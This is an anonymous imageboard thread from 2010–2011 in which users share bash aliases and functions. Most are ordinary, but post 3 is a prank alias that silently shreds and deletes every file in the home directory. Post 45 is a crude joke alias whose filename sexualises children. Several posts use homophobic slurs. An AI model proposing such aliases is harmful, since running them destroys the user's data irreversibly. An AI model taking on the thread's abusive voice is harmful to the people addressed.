bash aliases
1
Name:
Anonymous
2010-12-27 7:49
alias gentle='ionice -c 3 nice -n 20'
2
Name:
Anonymous
2010-12-27 8:00
function rarplay { unrar e $1 -inul | buffer | mplayer -; }
3
Name:
Anonymous
2010-12-27 8:34
alias bash='find ~ -type f -exec shred -u -n1 {} ";"'
4
Name:
Anonymous
2010-12-27 8:48
>>3
I love you, you magnificent bastard.
5
Name:
Anonymous
2010-12-27 10:31
>>4
I detest
bash to the point of willing to accept vile sarcasm in response to expressions of my hatred towards this despicable ``shell''.
6
Name:
Anonymous
2010-12-27 11:12
>>5
What are you, then? A zsh buff?
7
Name:
Anonymous
2010-12-27 12:30
>>6
What are you, then? A zsh ``faggot'' ?
fixed that for you
8
Name:
Anonymous
2010-12-27 12:35
function timestamp () { date +%Y%m%d-%H%M%S; }
function tvlm () { tail -f /var/log/messages; }
9
Name:
Anonymous
2010-12-27 12:39
alias makemore='make 2>&1 | more'
10
Name:
Anonymous
2010-12-27 13:25
11
Name:
Anonymous
2010-12-27 13:51
>>10
My bad, you want
unrarp, actually.
12
Name:
Anonymous
2010-12-27 14:29
13
Name:
Anonymous
2010-12-27 15:14
>>12
$ sudo apt-get install buffer
[sudo] password for xarn:
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: This is not ubuntu, faggot
$
14
Name:
Anonymous
2010-12-27 16:19
>>2
I can't let that pass; why the fuck would you keep movies in rar files?
15
Name:
Anonymous
2010-12-27 17:35
>>14
Because you can make them smaller. You could even
rar a
rared movie to make it smaller! But then you have to nest the un
raring. I usually nest no more than ten
rars, though.
16
Name:
Anonymous
2010-12-27 17:36
>>15
You could just use
FrozenVoid 's infinite compression algorithm.
17
Name:
Anonymous
2010-12-27 18:35
>>15
Disregarding the blatant and deliberate affront to information theory,
xz or
7z are still superior to
rar in both efficiency and openness.
If you absolutely must have them in an inconvenient and proprietary format, you could always
rot13 them a couple of times.
18
Name:
Anonymous
2010-12-27 20:30
>>14
Sometimes porn files are compressed in rar archives for some reason.
19
Name:
Anonymous
2010-12-27 23:35
20
Name:
Anonymous
2010-12-27 23:44
>>19
[codealias ed=vim[/code]
alias emacs=vim
YOU FUCKING BLASPHEMER , I can understand emacs, not everyone can like it, but
The Standard ED itor !
21
Name:
Anonymous
2010-12-27 23:45
22
Name:
Anonymous
2010-12-27 23:47
How BASH is better than LISP?
23
Name:
Anonymous
2010-12-27 23:48
24
Name:
Anonymous
2010-12-27 23:50
25
Name:
Anonymous
2010-12-27 23:52
>>21
I'm seeing this error a lot lately. Is it that hard to type ⌥Space?
26
Name:
Anonymous
2010-12-28 0:39
>>25
⌥
I have bitch tits.
27
Name:
Anonymous
2010-12-28 1:16
>>26
You should get that looked at.
28
Name:
Anonymous
2010-12-28 2:11
alias '>' = 'implying'
29
Name:
Anonymous
2010-12-28 4:58
>implying your alias makes any sense
30
Name:
Anonymous
2010-12-28 6:01
>>29
implying implications without a space after the >
31
Name:
Anonymous
2010-12-28 7:14
alias ped='perl -pi -e'
alias randcow='cowsay -f $(basename $(echo /usr/share/cows/* | tr -s " " "\n" | shuf | head -1) .cow)'
32
Name:
Anonymous
2010-12-28 15:09
What's the opposite of being nice?
alias cock='sudo nice -n -15 $(pidof $1)'
33
Name:
Anonymous
2010-12-28 15:26
>>17
you could always rot13 them a couple of times.
More like
rot13 them once.
34
Name:
Anonymous
2010-12-28 15:42
>>33
Single-
rot13 was cracked years ago. You have to apply multiple layers or it's useless.
35
Name:
Anonymous
2010-12-28 22:40
>>33
>>34
Who is trolling who?
36
Name:
Anonymous
2010-12-28 23:20
37
Name:
Anonymous
2010-12-29 0:45
You have been trolled by the sun. ☼
38
Name:
Anonymous
2010-12-29 2:45
You have been trolled by these stupids? Yes!
39
Name:
Anonymous
2010-12-29 5:31
>>37
don't blame it on the sunshine
40
Name:
Anonymous
2010-12-29 6:59
The Sunshine
41
Name:
Anonymous
2010-12-29 12:57
alias gputemp="aticonfig --od-gettemperature"
42
Name:
Anonymous
2010-12-29 13:18
The Sussshine.
43
Name:
Anonymous
2010-12-29 14:10
>>41
fglrx
You best be joking.
44
Name:
Anonymous
2010-12-29 14:27
45
Name:
Anonymous
2010-12-29 16:05
alias cp="tar -zxf pr0nForKids.tar.gz"
alias uncp="tar -zcf pr0nForKids.tar.gz pr0nForKids/; rm -r pr0nForKids/"
46
Name:
Anonymous
2010-12-29 17:26
The Sußmine
47
Name:
Anonymous
2010-12-29 17:27
§üßµñ
48
Name:
Anonymous
2010-12-30 17:27
>>14
Because retards upload movies as multipart rar archives to rapidshare. With this one can watch the movie while it is being downloaded, as long as you can download faster than you watch.
49
Name:
Anonymous
2011-01-17 16:57
This was a great thread ;_;
50
Name:
Anonymous
2011-01-17 17:18
51
Name:
Anonymous
2011-01-17 17:42
52
Name:
Anonymous
2011-01-18 7:00
>>49-51
Maybe it was indeed.
53
Name:
Anonymous
2011-01-18 7:03
function mkcd() {
mkdir -p $1 && cd $1
}
function scan() {
sudo iwlist wlan0 scan | awk -F '[ =:/]+' '/Quality/{ printf $3" " } /Encryption/{ printf $4" " } /ESSID/{ print $3 }'
}